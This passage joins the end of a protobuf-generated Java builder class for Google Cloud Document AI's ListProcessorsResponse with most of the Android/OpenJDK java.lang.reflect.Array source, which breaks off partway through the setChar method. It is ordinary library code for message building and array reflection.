com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstanceForType() { return com.google.cloud.documentai.v1.ListProcessorsResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse build() { com.google.cloud.documentai.v1.ListProcessorsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse buildPartial() { com.google.cloud.documentai.v1.ListProcessorsResponse result = new com.google.cloud.documentai.v1.ListProcessorsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.documentai.v1.ListProcessorsResponse result) { if (processorsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { processors_ = java.util.Collections.unmodifiableList(processors_); bitField0_ = (bitField0_ & ~0x00000001); } result.processors_ = processors_; } else { result.processors_ = processorsBuilder_.build(); } } private void buildPartial0(com.google.cloud.documentai.v1.ListProcessorsResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } 
@java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.documentai.v1.ListProcessorsResponse) { return mergeFrom((com.google.cloud.documentai.v1.ListProcessorsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.documentai.v1.ListProcessorsResponse other) { if (other == com.google.cloud.documentai.v1.ListProcessorsResponse.getDefaultInstance()) return this; if (processorsBuilder_ == null) { if (!other.processors_.isEmpty()) { if (processors_.isEmpty()) { processors_ = other.processors_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureProcessorsIsMutable(); processors_.addAll(other.processors_); } onChanged(); } } else { if (!other.processors_.isEmpty()) { if (processorsBuilder_.isEmpty()) { processorsBuilder_.dispose(); processorsBuilder_ = null; processors_ = other.processors_; bitField0_ = (bitField0_ & ~0x00000001); processorsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getProcessorsFieldBuilder() : null; } else { processorsBuilder_.addAllMessages(other.processors_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.documentai.v1.Processor m = input.readMessage( com.google.cloud.documentai.v1.Processor.parser(), extensionRegistry); if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(m); } else { processorsBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.documentai.v1.Processor> processors_ = java.util.Collections.emptyList(); private void ensureProcessorsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { processors_ = new java.util.ArrayList<com.google.cloud.documentai.v1.Processor>(processors_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, 
com.google.cloud.documentai.v1.ProcessorOrBuilder> processorsBuilder_; /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<com.google.cloud.documentai.v1.Processor> getProcessorsList() { if (processorsBuilder_ == null) { return java.util.Collections.unmodifiableList(processors_); } else { return processorsBuilder_.getMessageList(); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public int getProcessorsCount() { if (processorsBuilder_ == null) { return processors_.size(); } else { return processorsBuilder_.getCount(); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor getProcessors(int index) { if (processorsBuilder_ == null) { return processors_.get(index); } else { return processorsBuilder_.getMessage(index); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder setProcessors(int index, com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.set(index, value); onChanged(); } else { processorsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of processors. 
* </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder setProcessors( int index, com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.set(index, builderForValue.build()); onChanged(); } else { processorsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.add(value); onChanged(); } else { processorsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(int index, com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.add(index, value); onChanged(); } else { processorsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(builderForValue.build()); onChanged(); } else { processorsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. 
* </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors( int index, com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(index, builderForValue.build()); onChanged(); } else { processorsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addAllProcessors( java.lang.Iterable<? extends com.google.cloud.documentai.v1.Processor> values) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, processors_); onChanged(); } else { processorsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder clearProcessors() { if (processorsBuilder_ == null) { processors_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { processorsBuilder_.clear(); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder removeProcessors(int index) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.remove(index); onChanged(); } else { processorsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder getProcessorsBuilder(int index) { return getProcessorsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of processors. 
* </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.ProcessorOrBuilder getProcessorsOrBuilder(int index) { if (processorsBuilder_ == null) { return processors_.get(index); } else { return processorsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<? extends com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsOrBuilderList() { if (processorsBuilder_ != null) { return processorsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(processors_); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder addProcessorsBuilder() { return getProcessorsFieldBuilder() .addBuilder(com.google.cloud.documentai.v1.Processor.getDefaultInstance()); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder addProcessorsBuilder(int index) { return getProcessorsFieldBuilder() .addBuilder(index, com.google.cloud.documentai.v1.Processor.getDefaultInstance()); } /** * * * <pre> * The list of processors. 
* </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<com.google.cloud.documentai.v1.Processor.Builder> getProcessorsBuilderList() { return getProcessorsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsFieldBuilder() { if (processorsBuilder_ == null) { processorsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, com.google.cloud.documentai.v1.ProcessorOrBuilder>( processors_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); processors_ = null; } return processorsBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Points to the next processor, otherwise empty. 
* </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.documentai.v1.ListProcessorsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.documentai.v1.ListProcessorsResponse) private static final com.google.cloud.documentai.v1.ListProcessorsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.documentai.v1.ListProcessorsResponse(); } public static com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final 
com.google.protobuf.Parser<ListProcessorsResponse> PARSER = new com.google.protobuf.AbstractParser<ListProcessorsResponse>() { @java.lang.Override public ListProcessorsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListProcessorsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListProcessorsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/j2objc
36,106
jre_emul/android/platform/libcore/ojluni/src/main/java/java/lang/reflect/Array.java
/* * Copyright (C) 2014 The Android Open Source Project * Copyright (c) 1996, 2013, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.lang.reflect; /** * The {@code Array} class provides static methods to dynamically create and * access Java arrays. * * <p>{@code Array} permits widening conversions to occur during a get or set * operation, but throws an {@code IllegalArgumentException} if a narrowing * conversion would occur. * * @author Nakul Saraiya * @since 1.1 */ public final class Array { /** * Constructor. Class Array is not instantiable. */ private Array() {} /** * Creates a new array with the specified component type and * length. 
* Invoking this method is equivalent to creating an array * as follows: * <blockquote> * <pre> * int[] x = {length}; * Array.newInstance(componentType, x); * </pre> * </blockquote> * * <p>The number of dimensions of the new array must not * exceed 255. * * @param componentType the {@code Class} object representing the * component type of the new array * @param length the length of the new array * @return the new array * @exception NullPointerException if the specified * {@code componentType} parameter is null * @exception IllegalArgumentException if componentType is {@link * Void#TYPE} or if the number of dimensions of the requested array * instance exceed 255. * @exception NegativeArraySizeException if the specified {@code length} * is negative */ public static Object newInstance(Class<?> componentType, int length) throws NegativeArraySizeException { return newArray(componentType, length); } /** * Creates a new array * with the specified component type and dimensions. * If {@code componentType} * represents a non-array class or interface, the new array * has {@code dimensions.length} dimensions and * {@code componentType} as its component type. If * {@code componentType} represents an array class, the * number of dimensions of the new array is equal to the sum * of {@code dimensions.length} and the number of * dimensions of {@code componentType}. In this case, the * component type of the new array is the component type of * {@code componentType}. * * <p>The number of dimensions of the new array must not * exceed 255. 
* * @param componentType the {@code Class} object representing the component * type of the new array * @param dimensions an array of {@code int} representing the dimensions of * the new array * @return the new array * @exception NullPointerException if the specified * {@code componentType} argument is null * @exception IllegalArgumentException if the specified {@code dimensions} * argument is a zero-dimensional array, if componentType is {@link * Void#TYPE}, or if the number of dimensions of the requested array * instance exceed 255. * @exception NegativeArraySizeException if any of the components in * the specified {@code dimensions} argument is negative. */ public static Object newInstance(Class<?> componentType, int... dimensions) throws IllegalArgumentException, NegativeArraySizeException { // Android-changed: New implementation of newInstance(Class, int...). if (dimensions.length <= 0 || dimensions.length > 255) { throw new IllegalArgumentException("Bad number of dimensions: " + dimensions.length); } if (componentType == void.class) { throw new IllegalArgumentException("Can't allocate an array of void"); } if (componentType == null) { throw new NullPointerException("componentType == null"); } return createMultiArray(componentType, dimensions); } /** * Returns the length of the specified array object, as an {@code int}. * * @param array the array * @return the length of the array * @exception IllegalArgumentException if the object argument is not * an array */ // Android-changed: Non-native implementation of getLength(Object). // Android-changed: Removal of explicit throws IllegalArgumentException from method signature. 
public static int getLength(Object array) /* throws IllegalArgumentException */ { if (array instanceof Object[]) { return ((Object[]) array).length; } else if (array instanceof boolean[]) { return ((boolean[]) array).length; } else if (array instanceof byte[]) { return ((byte[]) array).length; } else if (array instanceof char[]) { return ((char[]) array).length; } else if (array instanceof double[]) { return ((double[]) array).length; } else if (array instanceof float[]) { return ((float[]) array).length; } else if (array instanceof int[]) { return ((int[]) array).length; } else if (array instanceof long[]) { return ((long[]) array).length; } else if (array instanceof short[]) { return ((short[]) array).length; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object. The value is automatically wrapped in an object * if it has a primitive type. * * @param array the array * @param index the index * @return the (possibly wrapped) value of the indexed component in * the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array */ // Android-changed: Non-native implementation of get(Object, int). public static Object get(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof Object[]) { return ((Object[]) array)[index]; } if (array instanceof boolean[]) { return ((boolean[]) array)[index] ? 
Boolean.TRUE : Boolean.FALSE; } if (array instanceof byte[]) { return Byte.valueOf(((byte[]) array)[index]); } if (array instanceof char[]) { return Character.valueOf(((char[]) array)[index]); } if (array instanceof short[]) { return Short.valueOf(((short[]) array)[index]); } if (array instanceof int[]) { return Integer.valueOf(((int[]) array)[index]); } if (array instanceof long[]) { return Long.valueOf(((long[]) array)[index]); } if (array instanceof float[]) { return new Float(((float[]) array)[index]); } if (array instanceof double[]) { return new Double(((double[]) array)[index]); } if (array == null) { throw new NullPointerException("array == null"); } throw notAnArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code boolean}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getBoolean(Object, int). public static boolean getBoolean(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof boolean[]) { return ((boolean[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code byte}. 
* * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getByte(Object, int). public static byte getByte(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof byte[]) { return ((byte[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code char}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getChar(Object, int). public static char getChar(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof char[]) { return ((char[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code short}. 
* * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getShort(Object, int). public static short getShort(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof short[]) { return ((short[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as an {@code int}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getInt(Object, int). 
public static int getInt(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code long}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getLong(Object, int). public static long getLong(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof long[]) { return ((long[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code float}. 
* * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getFloat(Object, int). public static float getFloat(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof float[]) { return ((float[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof long[]) { return ((long[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code double}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getDouble(Object, int). 
public static double getDouble(Object array, int index)
    throws IllegalArgumentException, ArrayIndexOutOfBoundsException {
    // double is read directly; every other numeric primitive widens to
    // double. The cases are mutually exclusive, so ordering is free.
    if (array instanceof double[]) {
        return ((double[]) array)[index];
    }
    if (array instanceof float[]) {
        return ((float[]) array)[index];
    }
    if (array instanceof long[]) {
        return ((long[]) array)[index];
    }
    if (array instanceof int[]) {
        return ((int[]) array)[index];
    }
    if (array instanceof short[]) {
        return ((short[]) array)[index];
    }
    if (array instanceof char[]) {
        return ((char[]) array)[index];
    }
    if (array instanceof byte[]) {
        return ((byte[]) array)[index];
    }
    throw badArray(array);
}

/**
 * Sets the value of the indexed component of the specified array
 * object to the specified new value. The new value is first
 * automatically unwrapped if the array has a primitive component
 * type.
 * @param array the array
 * @param index the index into the array
 * @param value the new value of the indexed component
 * @exception NullPointerException If the specified object argument
 * is null
 * @exception IllegalArgumentException If the specified object argument
 * is not an array, or if the array component type is primitive and
 * an unwrapping conversion fails
 * @exception ArrayIndexOutOfBoundsException If the specified {@code index}
 * argument is negative, or if it is greater than or equal to
 * the length of the specified array
 */
// Android-changed: Non-native implementation of set(Object, int, Object).
public static void set(Object array, int index, Object value)
    throws IllegalArgumentException, ArrayIndexOutOfBoundsException {
    // Implicit null check: dereferencing a null array throws a plain
    // NullPointerException here, matching the original implementation.
    if (!array.getClass().isArray()) {
        throw notAnArray(array);
    }
    if (array instanceof Object[]) {
        // Reference arrays: enforce assignability, then store directly.
        if (value != null && !array.getClass().getComponentType().isInstance(value)) {
            throw incompatibleType(array);
        }
        ((Object[]) array)[index] = value;
        return;
    }
    // Primitive arrays: unwrap the boxed value and dispatch to the
    // type-specific setter, which applies widening as permitted.
    if (value == null) {
        throw new IllegalArgumentException("Primitive array can't take null values.");
    }
    if (value instanceof Boolean) {
        setBoolean(array, index, ((Boolean) value).booleanValue());
    } else if (value instanceof Byte) {
        setByte(array, index, ((Byte) value).byteValue());
    } else if (value instanceof Character) {
        setChar(array, index, ((Character) value).charValue());
    } else if (value instanceof Short) {
        setShort(array, index, ((Short) value).shortValue());
    } else if (value instanceof Integer) {
        setInt(array, index, ((Integer) value).intValue());
    } else if (value instanceof Long) {
        setLong(array, index, ((Long) value).longValue());
    } else if (value instanceof Float) {
        setFloat(array, index, ((Float) value).floatValue());
    } else if (value instanceof Double) {
        setDouble(array, index, ((Double) value).doubleValue());
    }
    // NOTE: a non-null value of any other type is silently ignored here
    // (no store, no exception) — behavior preserved from the original.
}

/**
 * Sets the value of the indexed component of the specified array
 * object to the specified {@code boolean} value.
 * @param array the array
 * @param index the index into the array
 * @param z the new value of the indexed component
 * @exception NullPointerException If the specified object argument
 * is null
 * @exception IllegalArgumentException If the specified object argument
 * is not an array, or if the specified value cannot be converted
 * to the underlying array's component type by an identity or a
 * primitive widening conversion
 * @exception ArrayIndexOutOfBoundsException If the specified {@code index}
 * argument is negative, or if it is greater than or equal to
 * the length of the specified array
 * @see Array#set
 */
// Android-changed: Non-native implementation of setBoolean(Object, int, boolean).
// Android-changed: Removal of explicit runtime exceptions throws clause.
public static void setBoolean(Object array, int index, boolean z)
    /* throws IllegalArgumentException, ArrayIndexOutOfBoundsException */ {
    // boolean widens to nothing, so only boolean[] is accepted.
    if (!(array instanceof boolean[])) {
        throw badArray(array);
    }
    ((boolean[]) array)[index] = z;
}

/**
 * Sets the value of the indexed component of the specified array
 * object to the specified {@code byte} value.
 * @param array the array
 * @param index the index into the array
 * @param b the new value of the indexed component
 * @exception NullPointerException If the specified object argument
 * is null
 * @exception IllegalArgumentException If the specified object argument
 * is not an array, or if the specified value cannot be converted
 * to the underlying array's component type by an identity or a
 * primitive widening conversion
 * @exception ArrayIndexOutOfBoundsException If the specified {@code index}
 * argument is negative, or if it is greater than or equal to
 * the length of the specified array
 * @see Array#set
 */
// Android-changed: Non-native implementation of setByte(Object, int, byte).
public static void setByte(Object array, int index, byte b) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof byte[]) { ((byte[]) array)[index] = b; } else if (array instanceof double[]) { ((double[]) array)[index] = b; } else if (array instanceof float[]) { ((float[]) array)[index] = b; } else if (array instanceof int[]) { ((int[]) array)[index] = b; } else if (array instanceof long[]) { ((long[]) array)[index] = b; } else if (array instanceof short[]) { ((short[]) array)[index] = b; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code char} value. * @param array the array * @param index the index into the array * @param c the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setChar(Object, int, char). public static void setChar(Object array, int index, char c) throws IllegalArgumentException, 